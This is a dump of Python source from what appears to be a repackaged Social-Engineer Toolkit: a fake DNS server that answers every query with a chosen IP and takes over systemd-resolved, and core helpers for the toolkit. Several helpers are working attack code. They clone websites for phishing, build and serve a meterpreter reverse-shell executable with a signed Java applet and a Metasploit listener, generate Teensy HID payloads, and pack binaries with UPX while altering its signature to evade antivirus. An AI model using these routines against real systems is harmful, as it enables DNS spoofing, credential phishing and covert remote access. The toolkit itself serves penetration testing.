| 14,808 | Python | .py | 306 | 39.114379 | 125 | 0.610339 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,840 | minifakedns.py | CHEGEBB_africana-framework/externals/set/src/core/minifakedns.py | #!/usr/bin/env python
"""
SET core PyFakeMiniDNS server implementation.
Slightly modified implementation of Francisco Santos's PyfakeminiDNS
script designed to run as a thread and handle various additional
system configuration tasks, if necessary in the running environment,
along with a few implementation considerations specifically for SET.
"""
import os
import socket
import subprocess
import sys
import threading
# We need this module variable so the helper functions can be called
# from outside of this module, e.g., during SET startup and cleanup.
dns_server_thread = None
def start_dns_server(reply_ip):
"""
Helper function, intended to be called from other modules.
Args:
reply_ip (string): IPv4 address in dotted quad notation to use in all answers.
"""
global dns_server_thread
dns_server_thread = MiniFakeDNS(kwargs={'port': 53, 'ip': reply_ip})
dns_server_thread.start()
def stop_dns_server():
"""
Helper function, intended to be called from other modules.
"""
dns_server_thread.stop()
dns_server_thread.join()
dns_server_thread.cleanup()
class DNSQuery:
"""
A DNS query (that can be parsed as binary data).
See original for reference, but note there have been changes:
https://code.activestate.com/recipes/491264-mini-fake-dns-server/
Among the changes are variables names that have been translated
to English from their original Spanish.
"""
def __init__(self, data):
"""
Args:
data (bytes): The binary data of the DNS packet from the wire.
"""
self.data = data
# The domain name the client is querying the DNS for.
self.domain = ''
# Parse DNS packet headers.
txn_id = data[:2] # DNS transaction ID, two bytes.
flags = data[2:4] # DNS flags, also two bytes.
# To determine whether or not this DNS packet is a query that
# we should respond to, we need to examine the "QR" field and
# the "opcode" field. Together, these make up five bits, but
# they are the left-most bits (most-significant bits) in the
# first byte of the two-byte Flags field. An ASCII diagram:
#
# X XXXX ...
# ^ ^
# | \- The opcode bits are here.
# |
# The QR bit.
#
# To read them meaningfully, we first discard the three bits
# in the rightmost (least significant) position by performing
# a 3-place bitwise right shift, which in python is the `>>`
# operator. At that point, we have a byte value like this:
#
# 000 X XXXX
# ^ ^
# | \- The opcode bits are here.
# |
# The QR bit.
#
# Now that the most significant bits are all zero'ed out, we
# can test the values of the unknown bits to see if they are
# representing a standard query.
#
# In DNS, a standard query has the opcode field set to zero,
# so all the bits in the opcode field should be 0. Meanwhile,
# the QR field should also be a 0, representing a DNS query
# rather than a DNS reply. So what we are hoping to see is:
#
# 000 0 0000
#
# To test for this reliably, we do a bitwise AND with a value
# of decimal 31, which is 11111 in binary, exactly five bits:
#
# 00000000 (Remember, 0 AND 1 equals 0.)
# AND 00011111
# ------------
# 00000000 = decimal 0
#
# In one line of Python code, we get the following:
kind = (flags[0] >> 3) & 31 # Opcode is in bits 4, 5, 6, and 7 of first byte.
# QR bit is 8th bit, but it should be 0.
# And now, we test to see if the result
if 0 == kind: # was a standard query.
# The header of a DNS packet is exactly twelve bytes long,
# meaning that the very start of the first DNS question
# will always begin at the same offset.
offset = 12 # The first question begins at the 13th byte.
# The DNS protocol encodes domain names as a series of
# labels. Each label is prefixed by a single byte denoting
# that label's length.
length = data[offset]
while 0 != length:
self.domain += data[offset + 1 : offset + length + 1].decode() + '.'
offset += length + 1
length = data[offset]
def response(self, ip):
"""
Construct a DNS reply packet with a given IP address.
TODO: This responds incorrectly to EDNS queries that make use
of the OPT pseudo-record type. Specifically, the pointer
wrong because we do not check the length of the original
query we received. Instead, we should note the length of
the original packet until the end of the first question,
and truncate (i.e., drop, ignore) the remainder.
For now, what this actually means is that testing this
server using a recent version of `dig(1)` will fail
unless you use the `+noedns` query option. For example:
dig @127.0.0.1 example.com +noedns
Simpler or older DNS utilities such as `host(1)` are
probably going to work.
Args:
ip (string): IP address to respond with.
"""
packet = b''
if self.domain:
packet += self.data[:2] + b'\x81\x80'
packet += self.data[4:6] + self.data[4:6] + b'\x00\x00\x00\x00' # Questions and Answers Counts
packet += self.data[12:] # Original Domain Name Question
packet += b'\xc0\x0c' # Pointer to domain name
packet += b'\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04' # Response type, ttl and resource data length -> 4 bytes
packet += bytes([int(x) for x in ip.split('.')]) # 4 bytes of IP.
return packet
class MiniFakeDNS(threading.Thread):
"""
The MiniFakeDNS server, written to be run as a Python Thread.
"""
def __init__(self, group=None, target=None, name=None,
args=(), kwargs=None):
super(MiniFakeDNS, self).__init__(
group=group, target=target, name=name)
self.args = args
self.kwargs = kwargs
# The IPs address we will respond with.
self.ip = kwargs['ip']
# The port number we will attempt to bind to. Default is 53.
self.port = kwargs['port']
# Remember which configuration we usurped, if any. Used to cleanup.
self.cede_configuration = None
# A flag to indicate that the thread should exit.
self.stop_flag = False
def run(self):
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as udps:
udps.setblocking(False)
try:
udps.bind(('', self.port))
except OSError as e:
if 'Address already in use' == e.strerror and os.path.exists('/etc/resolv.conf'):
# We can't listen on port 53 because something else got
# there before we did. It's probably systemd-resolved's
# DNS stub resolver, but since we are probably running as
# the `root` user, we can fix this ourselves.
if 'stub-resolv.conf' in os.path.realpath('/etc/resolv.conf'):
self.usurp_systemd_resolved()
self.cede_configuration = self.cede_to_systemd_resolved
# Try binding again, now that the port might be available.
udps.bind(('', self.port))
while not self.stop_flag:
try:
data, addr = udps.recvfrom(1024)
p = DNSQuery(data)
udps.sendto(p.response(self.ip), addr)
except BlockingIOError:
pass
print("Exiting the DNS Server..")
sys.exit()
def cleanup(self):
if self.cede_configuration is not None:
self.cede_configuration()
def stop(self):
"""
Signals to the DNS server thread to stop.
"""
self.stop_flag = True
def usurp_systemd_resolved(self):
"""
Helper function to get systemd-resolved out of the way when it
is listening on 127.0.0.1:53 and we are trying to run SET's
own DNS server.
"""
try:
os.mkdir('/etc/systemd/resolved.conf.d')
except (OSError, FileExistsError):
pass
with open('/etc/systemd/resolved.conf.d/99-setoolkit-dns.conf', 'w') as f:
f.write("[Resolve]\nDNS=9.9.9.9\nDNSStubListener=no")
os.rename('/etc/resolv.conf', '/etc/resolv.conf.original')
os.symlink('/run/systemd/resolve/resolv.conf', '/etc/resolv.conf')
subprocess.call(['systemctl', 'restart', 'systemd-resolved.service'])
def cede_to_systemd_resolved(self):
"""
Helper function to cede system configuration back to systemd-resolved
after we have usurped control over DNS configuration away from it.
"""
os.remove('/etc/systemd/resolved.conf.d/99-setoolkit-dns.conf')
os.remove('/etc/resolv.conf')
os.rename('/etc/resolv.conf.original', '/etc/resolv.conf')
subprocess.call(['systemctl', 'restart', 'systemd-resolved.service'])
| 9,739 | Python | .py | 212 | 35.882075 | 122 | 0.588774 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,841 | setcore.py | CHEGEBB_africana-framework/externals/set/src/core/setcore.py | # !/usr/bin/env python3
#
# Centralized core modules for SET
#
#
import re
import sys
import socket
import subprocess
import shutil
import os
import time
import datetime
import random
import string
import inspect
import base64
from src.core import dictionaries
import src.core.minifakedns
import io
import trace
# python 2 and 3 compatibility
try:
from urllib.request import urlopen
except ImportError:
from urllib import urlopen
import multiprocessing
if sys.version_info >= (3, 0):
# python 3 removes reduce from builtin and into functools
from functools import *
# needed for backwards compatibility of python2 vs 3 - need to convert to
# threading eventually
try:
import thread
except ImportError:
import _thread as thread
try:
raw_input
except:
raw_input = input
# check to see if we have python-pycrypto
try:
from Cryptodome.Cipher import AES
except ImportError:
print(
"[!] The python-pycryptodome python module not installed. You will lose the ability for encrypted communications.")
pass
# get the main SET path
def definepath():
if check_os() == "posix":
if os.path.isfile("setoolkit"):
return os.getcwd()
else:
return "/usr/share/setoolkit/"
else:
return os.getcwd()
# check operating system
def check_os():
if os.name == "nt":
operating_system = "windows"
if os.name == "posix":
operating_system = "posix"
return operating_system
#
# Class for colors
#
if check_os() == "posix":
class bcolors:
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERL = '\033[4m'
ENDC = '\033[0m'
backBlack = '\033[40m'
backRed = '\033[41m'
backGreen = '\033[42m'
backYellow = '\033[43m'
backBlue = '\033[44m'
backMagenta = '\033[45m'
backCyan = '\033[46m'
backWhite = '\033[47m'
def disable(self):
self.PURPLE = ''
self.CYAN = ''
self.BLUE = ''
self.GREEN = ''
self.YELLOW = ''
self.RED = ''
self.ENDC = ''
self.BOLD = ''
self.UNDERL = ''
self.backBlack = ''
self.backRed = ''
self.backGreen = ''
self.backYellow = ''
self.backBlue = ''
self.backMagenta = ''
self.backCyan = ''
self.backWhite = ''
self.DARKCYAN = ''
# if we are windows or something like that then define colors as nothing
else:
class bcolors:
PURPLE = ''
CYAN = ''
DARKCYAN = ''
BLUE = ''
GREEN = ''
YELLOW = ''
RED = ''
BOLD = ''
UNDERL = ''
ENDC = ''
backBlack = ''
backRed = ''
backGreen = ''
backYellow = ''
backBlue = ''
backMagenta = ''
backCyan = ''
backWhite = ''
def disable(self):
self.PURPLE = ''
self.CYAN = ''
self.BLUE = ''
self.GREEN = ''
self.YELLOW = ''
self.RED = ''
self.ENDC = ''
self.BOLD = ''
self.UNDERL = ''
self.backBlack = ''
self.backRed = ''
self.backGreen = ''
self.backYellow = ''
self.backBlue = ''
self.backMagenta = ''
self.backCyan = ''
self.backWhite = ''
self.DARKCYAN = ''
# this will be the home for the set menus
def setprompt(category, text):
# if no special prompt and no text, return plain prompt
if category == '0' and text == "":
return bcolors.GREEN + "(" + bcolors.ENDC + "africana:" + bcolors.DARKCYAN + "framework" + bcolors.GREEN + ")# " + bcolors.ENDC
# if the loop is here, either category or text was positive
# if it's the category that is blank...return prompt with only the text
if category == '0':
return bcolors.GREEN + "(" + bcolors.ENDC + "africana:" + bcolors.DARKCYAN + "framework" + bcolors.GREEN + ")# " + bcolors.ENDC
# category is NOT blank
else:
# initialize the base 'set' prompt
prompt = bcolors.GREEN + "(" + bcolors.ENDC + "africana:" + bcolors.DARKCYAN + "framework" + bcolors.GREEN + ")# " + bcolors.ENDC
# if there is a category but no text
if text == "":
for level in category:
level = dictionaries.category(level)
prompt += ":" + bcolors.UNDERL + \
bcolors.DARKCYAN + level + bcolors.ENDC
promptstring = str(prompt)
promptstring += " > "
return promptstring
# if there is both a category AND text
else:
# iterate through the list received
for level in category:
level = dictionaries.category(level)
prompt += ":" + bcolors.UNDERL + \
bcolors.DARKCYAN + level + bcolors.ENDC
promptstring = str(prompt)
promptstring = promptstring + " > " + text + ":"
return promptstring
def yesno_prompt(category, text):
valid_response = False
while not valid_response:
response = raw_input(setprompt(category, text))
response = str.lower(response)
if response == "no" or response == "n":
response = "NO"
valid_response = True
elif response == "yes" or response == "y":
response = "YES"
valid_response = True
else:
print_warning("valid responses are 'n|y|N|Y|no|yes|No|Yes|NO|YES'")
return response
def return_continue():
print(("\n Press " + bcolors.RED +
"<return> " + bcolors.ENDC + "to continue"))
pause = raw_input()
# DEBUGGING #############
# ALWAYS SET TO ZERO BEFORE COMMIT!
DEBUG_LEVEL = 0
# 0 = Debugging OFF
# 1 = debug imports only
# 2 = debug imports with pause for <ENTER>
# 3 = imports, info messages
# 4 = imports, info messages with pause for <ENTER>
# 5 = imports, info messages, menus
# 6 = imports, info messages, menus with pause for <ENTER>
debugFrameString = '-' * 72
def debug_msg(currentModule, message, msgType):
if DEBUG_LEVEL == 0:
pass # stop evaluation efficiently
else:
if msgType <= DEBUG_LEVEL:
# a bit more streamlined
print(bcolors.RED + "\nDEBUG_MSG: from module '" +
currentModule + "': " + message + bcolors.ENDC)
if DEBUG_LEVEL == 2 or DEBUG_LEVEL == 4 or DEBUG_LEVEL == 6:
raw_input("waiting for <ENTER>\n")
def mod_name():
frame_records = inspect.stack()[1]
calling_module = inspect.getmodulename(frame_records[1])
return calling_module
#
# RUNTIME MESSAGES ############
def print_status(message):
print(bcolors.GREEN + bcolors.BOLD + "[*] " + bcolors.ENDC + str(message))
def print_info(message):
print(bcolors.BLUE + bcolors.BOLD + "[-] " + bcolors.ENDC + str(message))
def print_info_spaces(message):
print(bcolors.BLUE + bcolors.BOLD + " [-] " + bcolors.ENDC + str(message))
def print_warning(message):
print(bcolors.YELLOW + bcolors.BOLD + "[!] " + bcolors.ENDC + str(message))
def print_error(message):
print(bcolors.RED + bcolors.BOLD +
"[!] " + bcolors.ENDC + bcolors.RED + str(message) + bcolors.ENDC)
def get_version():
define_version = open("src/core/set.version", "r").read().rstrip()
# define_version = '7.2.3'
return define_version
class create_menu:
def __init__(self, text, menu):
self.text = text
self.menu = menu
print(text)
for i, option in enumerate(menu):
menunum = i + 1
# Check to see if this line has the 'return to main menu' code
match = re.search("0D", option)
# If it's not the return to menu line:
if not match:
if menunum < 10:
print((' %s) %s' % (menunum, option)))
else:
print((' %s) %s' % (menunum, option)))
else:
print('\n 0) Return to Main Menu\n')
return
def detect_public_ip():
"""
Helper function to auto-detect our public IP(v4) address.
"""
rhost = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
rhost.connect(('google.com', 0))
rhost.settimeout(2)
return rhost.getsockname()[0]
def validate_ip(address):
"""
Validates that a given string is an IPv4 dotted quad.
"""
try:
if socket.inet_aton(address):
if len(address.split('.')) == 4:
debug_msg("setcore", "this is a valid IP address", 5)
return True
else:
print_error("This is not a valid IP address...")
raise socket.error
else:
raise socket_error
except socket.error:
return False
#
# grab the metaspoit path
#
def meta_path():
# DEFINE METASPLOIT PATH
trigger = 0
try:
# pull from config first
msf_path = check_config("METASPLOIT_PATH=")
if not msf_path.endswith("/"):
msf_path = msf_path + "/"
if os.path.isfile(msf_path + "msfconsole"):
trigger = 1
# if we are using just the standard path for msfconsole
if os.path.isfile("/usr/bin/msfconsole"):
if trigger == 0:
msf_path = "/usr/bin/"
trigger = 1
# specific for backbox linux
if os.path.isfile("/opt/metasploit-framework/msfconsole"):
if trigger == 0:
msf_path = "/opt/metasploit-framework/"
trigger = 1
# specific for kali linux
if os.path.isfile("/opt/metasploit/apps/pro/msf3/msfconsole"):
# left blank since you can call launcher and ruby1.9 - 2x issues
# are there
if trigger == 0:
msf_path = ""
trigger = 1
# specific for backtrack5 and other backtrack versions
if os.path.isfile("/opt/framework3/msf3/msfconsole"):
if trigger == 0:
msf_path = "/opt/framework3/msf3/"
trigger = 1
if os.path.isfile("/opt/framework/msf3/msfconsole"):
if trigger == 0:
msf_path = "/opt/framework/msf3/"
trigger = 1
if os.path.isfile("/opt/metasploit/msf3/msfconsole"):
if trigger == 0:
msf_path = "/opt/metasploit/msf3/"
trigger = 1
# specific for pwnpad and pwnplug (pwnie express)
if os.path.isfile("/opt/metasploit-framework/msfconsole"):
if trigger == 0:
msf_path = "/opt/metasploit-framework/"
trigger = 1
# specific for pentesters framework github.com/trustedsec/ptf
if os.path.isfile("/pentest/exploitation/metasploit/msfconsole"):
if trigger == 0:
msf_path = "/pentest/exploitation/metasploit/"
trigger = 1
# Kali linux bleeding edge should return this in order to work
if os.path.isfile("/usr/share/metasploit-framework/msfconsole"):
if trigger == 0:
msf_path = "/usr/share/metasploit-framework/"
trigger = 1
# if we didn't find anything
if trigger == 0:
print_error(
"Metasploit path not found. These payloads will be disabled.")
print_error(
"Please configure Metasploit's path in the /etc/setoolkit/set.config file.")
msf_path = False
except Exception as e:
print_status("Something went wrong. Printing error: " + str(e))
# this is an option if we don't want to use Metasploit period
check_metasploit = check_config("METASPLOIT_MODE=").lower()
if check_metasploit != "on":
msf_path = False
return msf_path
#
# grab the metaspoit path
#
def meta_database():
# DEFINE METASPLOIT PATH
meta_path = open("/etc/setoolkit/set.config", "r").readlines()
for line in meta_path:
line = line.rstrip()
match = re.search("METASPLOIT_DATABASE=", line)
if match:
line = line.replace("METASPLOIT_DATABASE=", "")
msf_database = line.rstrip()
return msf_database
#
# grab the interface ip address
#
def grab_ipaddress():
try:
revipaddr = detect_public_ip()
rhost = raw_input(setprompt("0", "IP address or URL (www.ex.com) for the payload listener (LHOST) [" + revipaddr + "]"))
if rhost == "": rhost = revipaddr
except Exception:
rhost = raw_input(setprompt("0", "Enter your interface/reverse listener IP Address or URL"))
if validate_ip(rhost) == False:
while 1:
choice = raw_input(setprompt(["2"], "This is not an IP address. Are you using a hostname? [y/n] "))
if choice == "" or choice.lower() == "y":
print_status("Roger that ghostrider. Using hostnames moving forward (hostnames are 1337, nice job)..")
break
else:
rhost = raw_input(setprompt(["2"], "IP address for the reverse connection [" + rhost + "]"))
if validate_ip(rhost) == True: break
else:
choice = raw_input(setprompt(["2"], "This is not an IP address. Are you using a hostname? [y/n] "))
if choice == "" or choice.lower() == "y":
print_status("Roger that ghostrider. Using hostnames moving forward (hostnames are 1337, nice job)..")
break
# rhost return when verified
return rhost
#
# cleanup old or stale files
#
def cleanup_routine():
try:
# restore original Java Applet
shutil.copyfile("%s/src/html/Signed_Update.jar.orig" %
(definepath()), userconfigpath + "Signed_Update.jar")
if os.path.isfile("newcert.pem"):
os.remove("newcert.pem")
if os.path.isfile(userconfigpath + "interfaces"):
os.remove(userconfigpath + "interfaces")
if os.path.isfile("src/html/1msf.raw"):
os.remove("src/html/1msf.raw")
if os.path.isfile("src/html/2msf.raw"):
os.remove("src/html/2msf.raw")
if os.path.isfile("msf.exe"):
os.remove("msf.exe")
if os.path.isfile("src/html/index.html"):
os.remove("src/html/index.html")
if os.path.isfile(userconfigpath + "Signed_Update.jar"):
os.remove(userconfigpath + "Signed_Update.jar")
if os.path.isfile(userconfigpath + "version.lock"):
os.remove(userconfigpath + "version.lock")
src.core.minifakedns.stop_dns_server()
except:
pass
#
# Update The Social-Engineer Toolkit
#
def update_set():
backbox = check_backbox()
kali = check_kali()
if backbox == "BackBox":
print_status(
"You are running BackBox Linux which already implements SET updates.")
print_status(
"No need for further operations, just update your system.")
time.sleep(2)
elif kali == "Kali":
print_status("You are running Kali Linux which maintains SET updates.")
time.sleep(2)
# if we aren't running Kali or BackBox :(
else:
print_info("Kali or BackBox Linux not detected, manually updating..")
print_info("Updating the Social-Engineer Toolkit, be patient...")
print_info("Performing cleanup first...")
subprocess.Popen("git clean -fd", shell=True).wait()
print_info("Updating... This could take a little bit...")
subprocess.Popen("git pull", shell=True).wait()
print_status("The updating has finished, returning to main menu..")
time.sleep(2)
#
# Pull the help menu here
#
def help_menu():
fileopen = open("README.md", "r").readlines()
for line in fileopen:
line = line.rstrip()
print(line)
fileopen = open("readme/CREDITS", "r").readlines()
print("\n")
for line in fileopen:
line = line.rstrip()
print(line)
return_continue()
#
# This is a small area to generate the date and time
#
def date_time():
now = str(datetime.datetime.today())
return now
#
# generate a random string
#
def generate_random_string(low, high):
length = random.randint(low, high)
letters = string.ascii_letters # + string.digits
return ''.join([random.choice(letters) for _ in range(length)])
#
# clone JUST a website, and export it.
# Will do no additional attacks.
#
def site_cloner(website, exportpath, *args):
grab_ipaddress()
ipaddr = grab_ipaddress()
filewrite = open(userconfigpath + "interface", "w")
filewrite.write(ipaddr)
filewrite.close()
filewrite = open(userconfigpath + "ipaddr", "w")
filewrite.write(ipaddr)
filewrite.close()
filewrite = open(userconfigpath + "site.template", "w")
filewrite.write("URL=" + website)
filewrite.close()
# if we specify a second argument this means we want to use java applet
if args[0] == "java":
# needed to define attack vector
filewrite = open(userconfigpath + "attack_vector", "w")
filewrite.write("java")
filewrite.close()
sys.path.append("src/webattack/web_clone")
# if we are using menu mode we reload just in case
try:
debug_msg("setcore", "importing 'src.webattack.web_clone.cloner'", 1)
module_reload(cloner)
except:
debug_msg("setcore", "importing 'src.webattack.web_clone.cloner'", 1)
import cloner
# copy the file to a new folder
print_status("Site has been successfully cloned and is: " + exportpath)
subprocess.Popen("mkdir '%s';cp %s/web_clone/* '%s'" % (exportpath, userconfigpath,
exportpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
#
# This will start a web server in the directory root you specify, so for example
# you clone a website then run it in that web server, it will pull any index.html file
#
def start_web_server(directory):
try:
# import the threading, socketserver, and simplehttpserver
import socketserver
import http.server
# create the httpd handler for the simplehttpserver
# we set the allow_reuse_address incase something hangs can still bind
# to port
class ReusableTCPServer(socketserver.TCPServer):
allow_reuse_address = True
# specify the httpd service on 0.0.0.0 (all interfaces) on port 80
httpd = ReusableTCPServer(
("0.0.0.0", 80), http.server.SimpleHTTPRequestHandler)
# thread this mofo
os.chdir(directory)
thread.start_new_thread(httpd.serve_forever, ())
# handle keyboard interrupts
except KeyboardInterrupt:
print_info("Exiting the SET web server...")
httpd.socket.close()
#
# this will start a web server without threads
#
def start_web_server_unthreaded(directory):
try:
# import the threading, socketserver, and simplehttpserver
import thread
import socketserver
import http.server
# create the httpd handler for the simplehttpserver
# we set the allow_reuse_address incase something hangs can still bind
# to port
class ReusableTCPServer(socketserver.TCPServer):
allow_reuse_address = True
# specify the httpd service on 0.0.0.0 (all interfaces) on port 80
httpd = ReusableTCPServer(
("0.0.0.0", 80), http.server.SimpleHTTPRequestHandler)
# thread this mofo
os.chdir(directory)
httpd.serve_forever()
# change directory to the path we specify for output path
os.chdir(directory)
# handle keyboard interrupts
except KeyboardInterrupt:
print_info("Exiting the SET web server...")
httpd.socket.close()
#
# This will create the java applet attack from start to finish.
# Includes payload (reverse_meterpreter for now) cloning website
# and additional capabilities.
#
def java_applet_attack(website, port, directory):
# create the payload
meterpreter_reverse_tcp_exe(port)
# clone the website and inject java applet
site_cloner(website, directory, "java")
# this part is needed to rename the msf.exe file to a randomly generated
# one
filename = check_options("MSF.EXE=")
if check_options != 0:
# move the file to the specified directory and filename
subprocess.Popen("cp %s/msf.exe %s/%s" % (userconfigpath, directory, filename),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
applet_name = check_options("APPLET_NAME=")
if applet_name == "":
applet_name = generate_random_string(6, 15) + ".jar"
# lastly we need to copy over the signed applet
subprocess.Popen(
"cp %s/Signed_Update.jar %s/%s" % (userconfigpath, directory, applet_name),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# start the web server by running it in the background
start_web_server(directory)
# run multi handler for metasploit
print_info("Starting the multi/handler through Metasploit...")
metasploit_listener_start("windows/meterpreter/reverse_tcp", port)
#
# this will create a raw PDE file for you to use in your teensy device
#
#
def teensy_pde_generator(attack_method):
# grab the ipaddress
ipaddr = grab_ipaddress()
# if we are doing the attack vector teensy beef
if attack_method == "beef":
# specify the filename
filename = open("src/teensy/beef.ino", "r")
filewrite = open(userconfigpath + "reports/beef.ino", "w")
teensy_string = (
"Successfully generated Teensy HID Beef Attack Vector under %s/reports/beef.ino" % (userconfigpath))
# if we are doing the attack vector teensy beef
if attack_method == "powershell_down":
# specify the filename
filename = open("src/teensy/powershell_down.ino", "r")
filewrite = open(userconfigpath + "reports/powershell_down.ino", "w")
teensy_string = (
"Successfully generated Teensy HID Attack Vector under %s/reports/powershell_down.ino" % (userconfigpath))
# if we are doing the attack vector teensy
if attack_method == "powershell_reverse":
# specify the filename
filename = open("src/teensy/powershell_reverse.ino", "r")
filewrite = open(userconfigpath + "reports/powershell_reverse.ino", "w")
teensy_string = (
"Successfully generated Teensy HID Attack Vector under %s/reports/powershell_reverse.ino" % (userconfigpath))
# if we are doing the attack vector teensy beef
if attack_method == "java_applet":
# specify the filename
filename = open("src/teensy/java_applet.ino", "r")
filewrite = open(userconfigpath + "reports/java_applet.ino", "w")
teensy_string = (
"Successfully generated Teensy HID Attack Vector under %s/reports/java_applet.ino" % (userconfigpath))
# if we are doing the attack vector teensy
if attack_method == "wscript":
# specify the filename
filename = open("src/teensy/wscript.ino", "r")
filewrite = open(userconfigpath + "reports/wscript.ino", "w")
teensy_string = (
"Successfully generated Teensy HID Attack Vector under %s/reports/wscript.ino" % (userconfigpath))
# All the options share this code except binary2teensy
if attack_method != "binary2teensy":
for line in filename:
line = line.rstrip()
match = re.search("IPADDR", line)
if match:
line = line.replace("IPADDR", ipaddr)
filewrite.write(line)
# binary2teensy method
if attack_method == "binary2teensy":
# specify the filename
import src.teensy.binary2teensy
teensy_string = (
"Successfully generated Teensy HID Attack Vector under %s/reports/binary2teensy.ino" % (userconfigpath))
print_status(teensy_string)
#
# Expand the filesystem windows directory
#
def windows_root():
return os.environ['WINDIR']
#
# core log file routine for SET
#
def log(error):
try:
# open log file only if directory is present (may be out of directory
# for some reason)
if not os.path.isfile("%s/src/logs/set_logfile.log" % (definepath())):
filewrite = open("%s/src/logs/set_logfile.log" %
(definepath()), "w")
filewrite.write("")
filewrite.close()
if os.path.isfile("%s/src/logs/set_logfile.log" % (definepath())):
error = str(error)
# open file for writing
filewrite = open("%s/src/logs/set_logfile.log" %
(definepath()), "a")
# write error message out
filewrite.write("ERROR: " + date_time() + ": " + error + "\n")
# close the file
filewrite.close()
except IOError as err:
pass
#
# upx encoding and modify binary
#
def upx(path_to_file):
# open the set_config
fileopen = open("/etc/setoolkit/set.config", "r")
for line in fileopen:
line = line.rstrip()
match = re.search("UPX_PATH=", line)
if match:
upx_path = line.replace("UPX_PATH=", "")
# if it isn't there then bomb out
if not os.path.isfile(upx_path):
print_warning(
"UPX was not detected. Try configuring the set_config again.")
# if we detect it
if os.path.isfile(upx_path):
print_info(
"Packing the executable and obfuscating PE file randomly, one moment.")
# packing executable
subprocess.Popen(
"%s -9 -q -o %s/temp.binary %s" % (upx_path, userconfigpath, path_to_file),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# move it over the old file
subprocess.Popen("mv %s/temp.binary %s" % (userconfigpath, path_to_file),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# random string
random_string = generate_random_string(3, 3).upper()
# 4 upx replace - we replace 4 upx open the file
fileopen = open(path_to_file, "rb")
filewrite = open(userconfigpath + "temp.binary", "wb")
# read the file open for data
data = fileopen.read()
# replace UPX stub makes better evasion for A/V
filewrite.write(data.replace("UPX", random_string, 4))
filewrite.close()
# copy the file over
subprocess.Popen("mv %s/temp.binary %s" % (userconfigpath, path_to_file),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
time.sleep(3)
def show_banner(define_version, graphic):
if graphic == "1":
if check_os() == "posix":
os.system("clear")
if check_os() == "windows":
os.system("cls")
show_graphic()
else:
os.system("clear")
print(bcolors.BLUE + """
[---] The Social-Engineer Toolkit (""" + bcolors.YELLOW + """SET""" + bcolors.BLUE + """) [---]
[---] Created by:""" + bcolors.RED + """ David Kennedy """ + bcolors.BLUE + """(""" + bcolors.YELLOW + """ReL1K""" + bcolors.BLUE + """) [---]
Version: """ + bcolors.RED + """%s""" % (define_version) + bcolors.BLUE + """
Codename: '""" + bcolors.YELLOW + """Maverick""" + bcolors.ENDC + bcolors.BLUE + """'
[---] Follow us on Twitter: """ + bcolors.PURPLE + """@TrustedSec""" + bcolors.BLUE + """ [---]
[---] Follow me on Twitter: """ + bcolors.PURPLE + """@HackingDave""" + bcolors.BLUE + """ [---]
[---] Homepage: """ + bcolors.YELLOW + """https://www.trustedsec.com""" + bcolors.BLUE + """ [---]
""" + bcolors.GREEN + """ Welcome to the Social-Engineer Toolkit (SET).
The one stop shop for all of your SE needs.
""")
print(bcolors.BOLD + """ The Social-Engineer Toolkit is a product of TrustedSec.\n\n Visit: """ +
bcolors.GREEN + """https://www.trustedsec.com\n""" + bcolors.ENDC)
print(bcolors.BLUE + """ It's easy to update using the PenTesters Framework! (PTF)\nVisit """ + bcolors.YELLOW +
"""https://github.com/trustedsec/ptf""" + bcolors.BLUE + """ to update all your tools!\n\n""" + bcolors.ENDC)
# here we check if there is a new version of SET - if there is, then
# display a banner
cv = get_version()
# pull version
try:
version = ""
def pull_version():
if not os.path.isfile(userconfigpath + "version.lock"):
try:
url = (
'https://raw.githubusercontent.com/trustedsec/social-engineer-toolkit/master/src/core/set.version')
version = urlopen(url).read().rstrip().decode('utf-8')
filewrite = open(userconfigpath + "version.lock", "w")
filewrite.write(version)
filewrite.close()
except KeyboardInterrupt:
version = "keyboard interrupt"
else:
version = open(userconfigpath + "version.lock", "r").read()
if cv != version:
if version != "":
print(bcolors.RED + " There is a new version of SET available.\n " + bcolors.GREEN + " Your version: " + bcolors.RED + cv + bcolors.GREEN +
"\n Current version: " + bcolors.ENDC + bcolors.BOLD + version + bcolors.YELLOW + "\n\nPlease update SET to the latest before submitting any git issues.\n\n" + bcolors.ENDC)
# why urllib and sockets cant control DNS resolvers is beyond me - so
# we use this as a hack job to add a delay and kill if updates are
# taking too long
p = multiprocessing.Process(target=pull_version)
#p.start()
# Wait for 5 seconds or until process finishes
#p.join(8)
# If thread is still active
if p.is_alive():
print(
bcolors.RED + " Unable to check for new version of SET (is your network up?)\n" + bcolors.ENDC)
# terminate the process
p.terminate()
p.join()
except Exception as err:
print(err)
# pass
def show_graphic():
menu = random.randrange(2, 15)
if menu == 2:
print(bcolors.YELLOW + r"""
_,._
__.' _)
<_,)'.-"a\
/' ( \
_.-----..,-' (`"--^
// |
(| `; , |
\ ;.----/ ,/
) // / | |\ \
\ \\`\ | |/ / Jesus Christ
\ \\ \ | |\/ Lamb that was slain.
`" `" `"` """ + bcolors.ENDC)
return
if menu == 3:
print(bcolors.GREEN + r"""
_ xxxx _
/_;-.__ / _\ _.-;_\
`-._`'`_/'`.-'
`\ /`
| /
/-.(
\_._\
\ \`;
> |/
/ //
|//
\(\ """ + bcolors.ENDC)
return
if menu == 4:
print(bcolors.BLUE + r"""
, ,
/////|
///// |
///// |
|~~~| | |
|===| |/|
| B |/| |
| I | | |
| B | | |
| L | /
| E | /
|===|/
'---'
Jesus love's u.
""" + bcolors.ENDC)
if menu == 5:
print(bcolors.RED + r"""
__ _____ _____ _ _
__| |___ ___ _ _ ___| | | |___|_|___| |_
